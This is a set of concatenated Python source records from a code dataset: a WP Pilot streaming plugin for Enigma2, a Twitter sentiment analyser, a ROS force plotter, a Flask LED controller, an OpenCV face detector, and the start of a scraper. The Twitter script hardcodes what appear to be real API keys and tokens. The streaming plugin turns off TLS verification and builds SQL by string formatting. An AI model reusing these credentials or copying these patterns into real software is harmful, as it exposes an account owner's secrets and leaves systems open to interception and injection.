bukiet do listy')\n if not f.endswith('\\n'):\n f += '\\n'\n f += '#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET \"%s\" ORDER BY bouquet\\n' % os.path.basename(file_name)\n open('/etc/enigma2/bouquets.tv','w').write(f)\n\ndef _login():\n def cookiesToString(cookies):\n try:\n return \"; \".join([str(x) + \"=\" + str(y) for x, y in cookies.get_dict().items()])\n except Exception as e:\n print(str(e))\n return None\n \n import requests\n \n response = requests.post(\n params['login_url'],\n json=data,\n verify=False,\n headers=headers\n )\n\n meta = response.json().get('_meta', None)\n if meta is not None:\n if meta.get('error', {}).get('name', None) is not None:\n return None\n \n saveCookie(cookiesToString(response.cookies))\n return getCookie()\n\nif __name__ == '__main__':\n if len(sys.argv) >=5:\n file_name = sys.argv[1]\n #print 'filename' , file_name\n #print path + file_name\n data['login'] = sys.argv[2]\n #print 'username' , data['login']\n data['password'] = sys.argv[3]\n #print 'password' 
, data['password']\n streamlinkURL = 'http%%3a//127.0.0.1%%3a%s/' % sys.argv[4]\n frameWork = sys.argv[5]\n #print frameWork\n _generate_E2bouquet()\n elif len(sys.argv) == 2 and sys.argv[1] == 'checkLogin':\n if _login():\n print('Zalogowano poprawnie\\n\\n')\n else:\n print('Nieudane logowanie. Sprawdź login i hasło w ustawieniach wtyczki.\\n\\n')\n\n# ORGINAL code for reference plugin.video.pilot.wp-0.1.3\n\"\"\"\nimport sys\nimport os\nfrom urlparse import parse_qsl\nimport urllib\nimport emukodi.xbmc as xbmc\nimport emukodi.xbmcgui as xbmcgui\nimport emukodi.xbmcplugin as xbmcplugin\nimport emukodi.xbmcaddon as xbmcaddon\nimport emukodi.xbmcvfs as xbmcvfs\n\n#constants\nbase_url = '' #sys.argv[0]\naddon_handle = 0 #int(sys.argv[1])\nparams = {} #dict(parse_qsl(sys.argv[2][1:]))\naddon = xbmcaddon.Addon(id='plugin.video.pilot.wp')\n\nlogin_url = 'https://pilot.wp.pl/api/v1/user_auth/login'\nmain_url = 'https://pilot.wp.pl/api/v1/channels/list?device=androidtv'\nvideo_url = 'https://pilot.wp.pl/api/v1/channel/'\nclose_stream_url = 'https://pilot.wp.pl/api/v1/channels/close'\n\nheaders = {\n 'user-agent': 'ExoMedia 4.3.0 (43000) / Android 8.0.0 / foster_e',\n 'accept': 'application/json',\n 'x-version': 'pl.videostar|3.25.0|Android|26|foster_e',\n 'content-type': 'application/json; charset=UTF-8'\n}\n\nusername = addon.getSetting('username')\npassword = addon.getSetting('password')\nfile_name = addon.getSetting('fname')\npath = addon.getSetting('path')\n#sessionid = params.get('sessionid', '')\n\n#addonInfo = xbmcaddon.Addon().getAddonInfo\ndataPath = '/usr/lib/enigma2/python/Plugins/Extensions/StreamlinkConfig' #xbmc.translatePath(addonInfo('profile')).decode('utf-8')\ncacheFile = os.path.join(dataPath, 'WPConfigCache.db')\n\n\ndef build_url(query):\n return base_url + '?' 
+ urllib.urlencode(query)\n\ndef add_item(name, image, is_folder, is_playble, payload, plot=''):\n list_item = xbmcgui.ListItem(label=name)\n\n if is_playble:\n list_item.setProperty(\"IsPlayable\", 'true')\n else:\n list_item.setProperty(\"IsPlayable\", 'false')\n\n list_item.setInfo(type='video', infoLabels={\n 'title': name, 'sorttitle': name, 'plot': plot})\n list_item.setArt({'thumb': image, 'poster': image, 'banner': image})\n xbmcplugin.addDirectoryItem(\n handle=addon_handle,\n url=build_url(payload),\n listitem=list_item,\n isFolder=is_folder\n )\n\n\ndef saveToDB(table_name, value):\n import sqlite3\n import os\n if os.path.exists(cacheFile):\n os.remove(cacheFile)\n else:\n print('File does not exists')\n conn = sqlite3.connect(cacheFile, detect_types=sqlite3.PARSE_DECLTYPES,\n cached_statements=20000)\n c = conn.cursor()\n c.execute('CREATE TABLE IF NOT EXISTS Cache(%s TEXT)' % table_name)\n c.execute(\"INSERT INTO Cache('%s') VALUES ('%s')\" % (table_name, value))\n conn.commit()\n c.close()\n\ndef readFromDB():\n import sqlite3\n conn = sqlite3.connect(cacheFile, detect_types=sqlite3.PARSE_DECLTYPES,\n cached_statements=20000)\n c = conn.cursor()\n c.execute(\"SELECT * FROM Cache\")\n for row in c:\n if row:\n c.close()\n return row[0]\n\ndef cookiesToString(cookies):\n try:\n return \"; \".join([str(x) + \"=\" + str(y) for x, y in cookies.get_dict().items()])\n except Exception as e:\n print (e)\n return ''\n\ndef login():\n if len(password) > 0 and len(username) > 0:\n data = {'device': 'AndroidTV', 'login': username, 'password': password}\n\n response = requests.post(\n login_url,\n json=data,\n verify=False,\n headers=headers\n )\n\n meta = response.json().get('_meta', None)\n if meta is not None:\n if meta.get('error', {}).get('name', None) is not None:\n xbmcgui.Dialog().notification('Nieudane logowanie', 'Sprawdź login i hasło w ustawieniach wtyczki.',\n xbmcgui.NOTIFICATION_ERROR, 5000)\n return ''\n\n saveToDB('wppilot_cache', cookiesToString(response.cookies))\n return cookiesToString(response.cookies)\n\n else:\n xbmcgui.Dialog().notification('Nieudane logowanie', 'Sprawdź login i hasło w ustawieniach wtyczki.',\n xbmcgui.NOTIFICATION_ERROR, 5000)\n return ''\n\ndef stream_url(video_id, retry=False):\n cookies = readFromDB()\n if not sessionid or len(video_id) == 0:\n return ''\n\n url = video_url + video_id\n data = {'format_id': '2', 'device_type': 'android'}\n\n headers.update({'Cookie': cookies})\n response = requests.get(\n url,\n params=data,\n verify=False,\n headers=headers,\n ).json()\n\n meta = response.get('_meta', None)\n if meta is not None:\n token = meta.get('error', {}).get('info', {}).get('stream_token', None)\n if token is not None:\n json = {'channelId': video_id, 't': token}\n response = requests.post(\n close_stream_url,\n json=json,\n verify=False,\n headers=headers\n ).json()\n if response.get('data', {}).get('status', '') == 'ok' and not retry:\n return stream_url(video_id, True)\n else:\n return\n\n if 'hls@live:abr' in response[u'data'][u'stream_channel'][u'streams'][0][u'type']:\n return response[u'data'][u'stream_channel'][u'streams'][0][u'url'][0]\n else:\n return response[u'data'][u'stream_channel'][u'streams'][1][u'url'][0]\n\n\ndef play(id):\n manifest = stream_url(id)\n\n if len(manifest) == 0:\n return\n manifest = manifest + '|user-agent=' + headers['user-agent']\n play_item = xbmcgui.ListItem(path=manifest)\n xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item) \n \ndef channels():\n if not sessionid:\n return []\n 
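    # [Editor's note] Hedged sketch, not part of the original add-on: the cookie
    # round-trip used throughout this file flattens the requests session cookies
    # into a single 'Cookie' header (see cookiesToString above) and replays it on
    # later calls. The URL and credentials below are hypothetical placeholders.
    #   r = requests.post('https://example.invalid/login', json={'login': 'u', 'password': 'p'})
    #   cookie_header = '; '.join('{}={}'.format(k, v) for k, v in r.cookies.get_dict().items())
    #   requests.get('https://example.invalid/channels', headers={'Cookie': cookie_header})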
cookies = readFromDB()\n headers.update({'Cookie': cookies})\n response = requests.get(\n main_url,\n verify=False,\n headers=headers,\n ).json()\n\n return response.get('data', [])\n\ndef generate_m3u():\n if not sessionid:\n return\n\n if file_name == '' or path == '':\n xbmcgui.Dialog().notification('WP Pilot', 'Ustaw nazwe pliku oraz katalog docelowy.',\n xbmcgui.NOTIFICATION_ERROR)\n return\n\n xbmcgui.Dialog().notification('WP Pilot', 'Generuje liste M3U.',\n xbmcgui.NOTIFICATION_INFO)\n data = '#EXTM3U\\n'\n\n for item in channels():\n if item.get('access_status', '') != 'unsubscribed':\n id = item.get('id', None)\n title = item.get('name', '')\n data += '#EXTINF:-1,%s\\nplugin://plugin.video.pilot.wp?action=PLAY&channel=%s\\n' % (\n title, id)\n\n f = xbmcvfs.File(path + file_name, 'w')\n f.write(data.encode('utf-8'))\n f.close()\n\n xbmcgui.Dialog().notification('WP Pilot', 'Wygenerowano liste M3U.', xbmcgui.NOTIFICATION_INFO)\n\ndef route():\n global sessionid\n if not sessionid:\n sessionid = login()\n\n mode = params.get('mode', None)\n action = params.get('action', '')\n\n if action == 'BUILD_M3U':\n generate_m3u()\n elif action == 'PLAY':\n id = params.get('channel', '')\n play(id)\n else:\n if not mode:\n home()\n elif mode == 'play':\n id = params.get('id', '')\n play(id)\n\n\nif __name__ == '__main__':\n route() \n\"\"\"\n", "sub_path": "StreamLink/usr/lib/enigma2/python/Plugins/Extensions/StreamlinkConfig/plugins/wpBouquet.py", "file_name": "wpBouquet.py", "file_ext": "py", "file_size_in_byte": 11822, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "wpConfig.getCookie", "line_number": 27, "usage_type": "call"}, {"api_name": "wpConfig.headers.update", "line_number": 36, "usage_type": "call"}, {"api_name": "wpConfig.headers", "line_number": 36, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "wpConfig.params", "line_number": 38, "usage_type": "name"}, {"api_name": "wpConfig.headers", "line_number": 40, "usage_type": "name"}, {"api_name": "wpConfig.data", "line_number": 51, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 51, "usage_type": "name"}, {"api_name": "channelsMappings.name2service4wpDict.get", "line_number": 60, "usage_type": "call"}, {"api_name": "channelsMappings.name2service4wpDict", "line_number": 60, "usage_type": "name"}, {"api_name": "channelsMappings.name2serviceDict.get", "line_number": 62, "usage_type": "call"}, {"api_name": "channelsMappings.name2serviceDict", "line_number": 62, "usage_type": "name"}, {"api_name": "channelsMappings.name2nameDict.get", "line_number": 62, "usage_type": "call"}, {"api_name": "channelsMappings.name2nameDict", "line_number": 62, "usage_type": "name"}, {"api_name": "wpConfig.data", "line_number": 70, "usage_type": "name"}, {"api_name": "wpConfig.params", "line_number": 70, "usage_type": "name"}, {"api_name": "wpConfig.data", "line_number": 71, "usage_type": "name"}, {"api_name": "wpConfig.data.encode", "line_number": 74, "usage_type": "call"}, {"api_name": "wpConfig.data", "line_number": 74, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": 
"attribute"}, {"api_name": "requests.post", "line_number": 96, "usage_type": "call"}, {"api_name": "wpConfig.params", "line_number": 97, "usage_type": "name"}, {"api_name": "wpConfig.data", "line_number": 98, "usage_type": "name"}, {"api_name": "wpConfig.headers", "line_number": 100, "usage_type": "name"}, {"api_name": "wpConfig.saveCookie", "line_number": 108, "usage_type": "call"}, {"api_name": "wpConfig.getCookie", "line_number": 109, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 112, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}, {"api_name": "wpConfig.data", "line_number": 116, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 116, "usage_type": "attribute"}, {"api_name": "wpConfig.data", "line_number": 118, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 118, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 120, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 121, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 124, "usage_type": "attribute"}]} +{"seq_id": "266974013", "text": "import re\nimport tweepy\nimport sys\nfrom tweepy import OAuthHandler\nfrom textblob import TextBlob\nimport os\n \nclass TwitterClient(object):\n '''\n Generic Twitter Class for sentiment analysis.\n Code modified from https://www.geeksforgeeks.org/twitter-sentiment-analysis-using-python/\n '''\n def __init__(self):\n '''\n Class constructor or initialization method.\n '''\n # keys and tokens from the Twitter Dev Console\n api_key = 'mabJ5Hs9iaLL3oUnEGJmeGURu'\n api_secret = 'TKxoibLLCDtp8hiXOaLy60DsvPsZePga5Ig4qUw62xP5QuZxdS'\n access_token = '985548524518608896-47tQqjE4L3u1FC8k53AC7TpOmXCbDnQ'\n access_token_secret = 'WQUEYIBb07MoJVVjqGx6DtV5nle8IdIDTW0QsTXUQ7aNa'\n\n # TODO: Change the above to use environment variables\n # api_key = os.environ['TWITTER_API_KEY']\n # api_secret = os.environ['TWITTER_API_SECRET']\n # access_token = os.environ['TWITTER_ACCESS_TOKEN']\n # access_token_secret = os.environ['TWITTER_ACCESS_SECRET']\n \n # attempt authentication\n try:\n # create OAuthHandler object\n self.auth = OAuthHandler(api_key, api_secret)\n # set access token and secret\n self.auth.set_access_token(access_token, access_token_secret)\n # create tweepy API object to fetch tweets\n self.api = tweepy.API(self.auth)\n except:\n print(\"Error: Authentication Failed\")\n \n def clean_tweet(self, tweet):\n '''\n Utility function to clean tweet text by removing links, special characters\n using simple regex statements.\n '''\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", unicode(tweet)).split())\n \n def get_tweet_sentiment(self, tweet):\n '''\n Utility function to classify sentiment of passed tweet\n using textblob's sentiment method\n '''\n # create TextBlob object of passed tweet text\n analysis = TextBlob(self.clean_tweet(tweet))\n # set sentiment\n if analysis.sentiment.polarity > 0:\n return 'positive'\n elif analysis.sentiment.polarity == 0:\n return 'neutral'\n else:\n return 'negative'\n \n def get_tweets(self, query, count = 10):\n '''\n Main function to fetch tweets and parse them.\n '''\n # empty list to store parsed tweets\n tweets = []\n \n try:\n # call twitter api to fetch tweets\n fetched_tweets = self.api.search(q = query, count = count)\n \n # parsing tweets one by one\n for tweet in fetched_tweets:\n # empty dictionary to store required params of a tweet\n parsed_tweet = {}\n \n # saving text of 
tweet\n parsed_tweet['text'] = tweet.text\n # saving sentiment of tweet\n parsed_tweet['sentiment'] = self.get_tweet_sentiment(tweet.text)\n \n # appending parsed tweet to tweets list\n if tweet.retweet_count > 0:\n # if tweet has retweets, ensure that it is appended only once\n if parsed_tweet not in tweets:\n tweets.append(parsed_tweet)\n else:\n tweets.append(parsed_tweet)\n \n # return parsed tweets\n return tweets\n \n except tweepy.TweepError as e:\n # print error (if any)\n print(\"Error : \" + str(e))\n\n def get_company_sentiment_descriptor(self, company_name):\n '''\n @returns: Tuple - (sentiment_val, descriptor)\n - sentiment_val is the sentiment score\n - descriptor is the description given this sentiment score\n '''\n tweets = self.get_tweets(company_name, count=100)\n tweet_sentiments = [self.get_tweet_sentiment(x) for x in tweets]\n\n # negative tweets carry weight -2, positive carry weight +1, neutral carry weight +0\n val_map = {'negative':-2, 'positive':1, 'neutral':0}\n sentiment_val_arr = [val_map[x] for x in tweet_sentiments]\n sentiment_val = sum(sentiment_val_arr)\n \n # print(\"TWEETS: \", tweets)\n print(\"SENTIMENT ARRAY: \", sentiment_val_arr)\n\n try:\n if sentiment_val < 0:\n neg_tweet_example = str(tweets[sentiment_val_arr.index(-2)]['text'].encode(sys.stdout.encoding, errors='replace'))\n descriptor = 'Twitter sentiment analysis shows that there is a substantial number of negative tweets surrounding ' \\\n + company_name \\\n + '. This may signal a controversial public presence, which should be taken into account when performing future research.' \\\n + 'An example of a negative tweet is shown below:\\n\\n' \\\n + neg_tweet_example\n else:\n pos_tweet_example = str(tweets[sentiment_val_arr.index(1)]['text'].encode(sys.stdout.encoding, errors='replace'))\n descriptor = 'Twitter sentiment analysis shows that tweets surrounding ' \\\n + company_name \\\n + ' are largely positive. ' \\\n + 'This may signal a company with a strong public presence and good public relations, which should be taken into account when performing future research.' 
\\\n + 'An example of a positive tweet is shown below: \\n \\n' \\\n + pos_tweet_example\n except:\n descriptor = \"No description available...\"\n\n return (sentiment_val, descriptor)\n\n \ncompany_name = \"Tesla\"\napi = TwitterClient()\ncompany_sentiment = api.get_company_sentiment_descriptor(company_name)\nprint(company_sentiment)\n\n\n\n", "sub_path": "src/app/get_sentiment.py", "file_name": "get_sentiment.py", "file_ext": "py", "file_size_in_byte": 5688, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tweepy.OAuthHandler", "line_number": 32, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 36, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 45, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 53, "usage_type": "call"}, {"api_name": "tweepy.TweepError", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 124, "usage_type": "attribute"}]} +{"seq_id": "250963598", "text": "import matplotlib.pyplot as plt\nimport rospy\nimport numpy as np\nfrom matplotlib.animation import FuncAnimation\n\nfrom geometry_msgs.msg import WrenchStamped\nfrom std_msgs.msg import String, Float64, Float32\n\nfrom my_message.msg import GraphData\n\namp =1 \n\nf = 1000\nfs = 20000\nT = 1/f\nTs = 1/fs\n\n\ncontinous = True\n\n#y = [amp.np.sin(2*np.pi*f*(i/fs)) for i in x]\n\nclass Visualiser:\n def __init__(self):\n self.fig, self.ax = plt.subplots()\n self.iFrame = 0\n self.sum = 0.0\n self.ln2, = plt.plot([],[], 'g')\n\n self.ln, = plt.plot([], [], 'r')\n\n self.x_data, self.y_data = [0] , [0]\n self.y_desired_data, self.x_desired_data = [0] , [0] \n\n self.count=0\n\n \n def plot_init(self, dt = Ts):\n self.dt = dt\n self.maxt = 5000\n self.ax.set_xlim(0, self.maxt)\n self.ax.set_ylim(-20, 20)\n return self.ln, self.ln2\n \n\n def odom_callback(self, msg):\n self.force_data = msg.data\n self.y_data.append(-self.force_data)\n #print(self.force_data)\n x_index = len(self.x_data)\n \n x_index2 = 2500+x_index\n \n if x_index <2500 or np.sin((x_index2/fs)*2*np.pi*f/100)*6<0:\n self.y_desired_data.append(0)\n else:\n self.y_desired_data.append(-np.sin((x_index2/fs)*2*np.pi*f/100)*6)\n\n self.x_desired_data.append(x_index2+1)\n self.x_data.append(x_index+1)\n \n if x_index>2500:\n dif = self.y_data[x_index] - self.y_desired_data[x_index-2500]\n else:\n dif=0\n squared_dif = dif**2\n\n self.sum = self.sum + squared_dif\n #if x_index!=0:\n # MSE = self.sum/x_index\n #print(MSE)\n #print(\"actual data:\"+ str(self.y_data[x_index]))\n #print(\"desired data:\"+ str(self.y_desired_data[x_index]))\n #pub = rospy.Publisher('force_data', GraphData, queue_size=1)\n #msg2 = GraphData()\n #msg2.ms_error = round(MSE,3)\n #msg2.y_desired = self.y_desired_data[x_index]\n #msg2.y_sensed = self.y_data[x_index]\n #msg2.x_value = x_index/500\n #pub2.publish(msg)\n\n\n \n def update_plot(self, frame):\n \n self.count+=1\n lastt=self.x_data[-1]\n if continous:\n if lastt >self.x_data[0]+self.maxt/2:\n self.ax.set_xlim(lastt - self.maxt/2,lastt + self.maxt/2)\n t = self.x_data[-1] +self.dt\n self.x_data.append(t)\n self.y_data.append(-self.force_data)\n\n\n t2 = self.x_desired_data[-1]+self.dt\n if t < 2500 or np.sin((t2/fs)*2*np.pi*f/100)*6<0:\n self.y_desired_data.append(0)\n else:\n self.y_desired_data.append(-np.sin((t2/fs)*2*np.pi*f/100)*6)\n self.x_desired_data.append(t2)\n \n 
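        # [Editor's note] Hedged sketch of the desired-force profile assembled
        # above: a half-wave-rectified sine at f/100 Hz (10 Hz for f=1000),
        # amplitude 6, sign-flipped, sampled at fs. Equivalently, vectorised:
        #   t = np.arange(0, 1, 1 / fs)
        #   y_desired = -np.clip(np.sin(2 * np.pi * (f / 100) * t), 0, None) * 6
        # This matches the per-sample branch in odom_callback and update_plot.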
self.ln2.set_data(self.x_desired_data, self.y_desired_data)\n\n\n return self.ln , self.ln2\n\n\nrospy.init_node('force_visual_node')\nvis = Visualiser()\nsub = rospy.Subscriber('/chatter', Float32, vis.odom_callback)\n\n#ani = FuncAnimation(vis.fig, vis.update_plot, interval= 1)\n\nani = FuncAnimation(vis.fig, vis.update_plot, init_func=vis.plot_init , interval= 1)\nplt.show(block=True) ", "sub_path": "my_message/src/lineFollow.py", "file_name": "lineFollow.py", "file_ext": "py", "file_size_in_byte": 3197, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplots", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.sin", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 100, "usage_type": "attribute"}, {"api_name": "rospy.init_node", "line_number": 109, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 111, "usage_type": "call"}, {"api_name": "std_msgs.msg.Float32", "line_number": 111, "usage_type": "argument"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "492784953", "text": "from flask import Flask, render_template, request, jsonify\nfrom multiprocessing import Queue\n\nfrom core.devices.input_device import InputDevice\nfrom core.devices.output_device import switch_animation_message, update_param_message\nfrom core.utilities import round_to_exponent\nimport time\napp = Flask(__name__)\n\n# Simplest way I know share data between functions in flask is to make a data dict\napp.data = {\n \"output_devices\": {}, # key: device name, value: device\n \"fft_in_queue\": None\n}\n\ndef run(host, port, output_devices, fft_in_queue):\n \"\"\"\n Call this function to start the server\n \"\"\"\n \n app.data[\"output_devices\"] = {device.name: device for device in output_devices} \n app.data[\"fft_in_queue\"] = fft_in_queue\n app.run(host=host, port=port)\n\n@app.route('/')\ndef index():\n \"\"\"\n Main page of controller\n \"\"\"\n\n # Data for template rendering\n devices = [device_render_data(device) for device in app.data[\"output_devices\"].values()]\n\n return render_template('index.html', \n devices=devices, \n fft_recorder=app.data[\"fft_in_queue\"] is not None\n )\n\n@app.route('/switch_animation', methods=['POST'])\ndef switch_animation():\n \"\"\"\n Switches an animation\n \"\"\"\n\n # Check format of POST data\n if \"device_name\" not in request.form:\n # TODO: log error\n return \"error: device name not specified\"\n 
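    # [Editor's note] Hedged sketch of how a client could exercise this route;
    # the host, port and example values are hypothetical, not from this repo:
    #   import requests
    #   requests.post('http://localhost:5000/switch_animation',
    #                 data={'device_name': 'strip1', 'new_animation': 'rainbow'})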
device_name = request.form[\"device_name\"]\n\n if request.form[\"device_name\"] not in app.data[\"output_devices\"]:\n # TODO: log error\n return \"error: device name unknown\"\n device = app.data[\"output_devices\"][device_name]\n\n if \"new_animation\" not in request.form:\n # TODO: log error\n return \"error: new animation not defined\"\n new_animation_name = request.form[\"new_animation\"]\n\n # Send switch message and then wait until it has been processed\n device.in_queue.put(switch_animation_message(new_animation_name))\n animation_data = device.animation_queue.get()\n\n return jsonify({\"name\": device.name, \"animation\": animation_data})\n\n@app.route(\"/set_param\", methods=[\"POST\"])\ndef set_param():\n \"\"\"\n Sets a parameter\n \"\"\"\n if \"param_name\" not in request.form:\n return \"no param name\"\n param_name = request.form[\"param_name\"].strip()\n\n if \"param_value\" not in request.form:\n return \"no param value\"\n param_value = float(request.form[\"param_value\"])\n\n if \"device_name\" not in request.form:\n return \"no device name\"\n\n if request.form[\"device_name\"] not in app.data[\"output_devices\"]:\n return \"unknown device name\"\n\n device = app.data[\"output_devices\"][request.form[\"device_name\"]]\n device.in_queue.put(update_param_message(param_name, param_value))\n\n return \"done\"\n\ndef put_fft_in_queue(message):\n \"\"\"\n Puts an item in the fft queue if there is one\n \"\"\"\n if app.data[\"fft_in_queue\"] is None:\n return\n\n app.data[\"fft_in_queue\"].put(message)\n\n@app.route(\"/start_record\")\ndef start_record():\n put_fft_in_queue(\"start_record\")\n return \"done\"\n\n@app.route(\"/stop_record\")\ndef stop_record():\n put_fft_in_queue(\"stop_record\")\n return \"done\"\n\ndef device_render_data(device):\n # Request current animation data\n device.in_queue.put(switch_animation_message(\"\"))\n\n return {\n \"name\": device.name,\n \"possible_animations\": device.possible_animations().keys(),\n \"animation\": device.animation_queue.get()\n }", "sub_path": "core/app/app_server.py", "file_name": "app_server.py", "file_ext": "py", "file_size_in_byte": 3457, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "core.devices.output_device.switch_animation_message", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form", 
"line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "core.devices.output_device.update_param_message", "line_number": 87, "usage_type": "call"}, {"api_name": "core.devices.output_device.switch_animation_message", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "638412738", "text": "import cv2\nimport numpy as np\nimport pkg_resources\n\nglobal_config = {\n 'VJ_cascade_path' : pkg_resources.resource_filename('boremeter', 'cv_haar_cascades/haarcascade_frontalface_default.xml'),\n 'cascade_params' : [1.15, 3],\n}\n\n\ndef get_faces_VJ(img, cascade):\n\n max_scale, min_neighbors = global_config['cascade_params']\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return cascade.detectMultiScale(gray, max_scale, min_neighbors)\n\n\ndef filter_faces(bbs):\n\n return bbs\n\n\ndef check_faces(bbs):\n\n return bbs\n\n\ndef detect_faces(img, raw_detector='VJ'):\n\n raw_faces = np.array([])\n\n if raw_detector == 'VJ':\n detector = cv2.CascadeClassifier(global_config['VJ_cascade_path'])\n raw_faces = get_faces_VJ(img, detector)\n\n filtered_faces = filter_faces(raw_faces)\n checked_faces = check_faces(filtered_faces)\n\n return checked_faces\n\n\ndef detect_faces_on_video(video_file_path, detection_step=1, frames_limit=200):\n\n input_video = cv2.VideoCapture(video_file_path)\n\n cur_frame = 0 \n frames = {}\n\n ret = True\n\n while cur_frame < frames_limit and ret:\n ret, frame = input_video.read() \n\n frames[cur_frame] = [0,1]\n frames[cur_frame][0] = frame\n\n if cur_frame % detection_step == 0:\n frames[cur_frame][1] = detect_faces(frame)\n else:\n frames[cur_frame][1] = np.array([])\n\n cur_frame += 1\n return frames\n", "sub_path": "boremeter/detector.py", "file_name": "detector.py", "file_ext": "py", "file_size_in_byte": 1428, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pkg_resources.resource_filename", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "183959824", "text": "# -*- coding: utf-8 -*-\nfrom urllib.parse import quote\nimport codecs\nimport json\nimport re\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom 
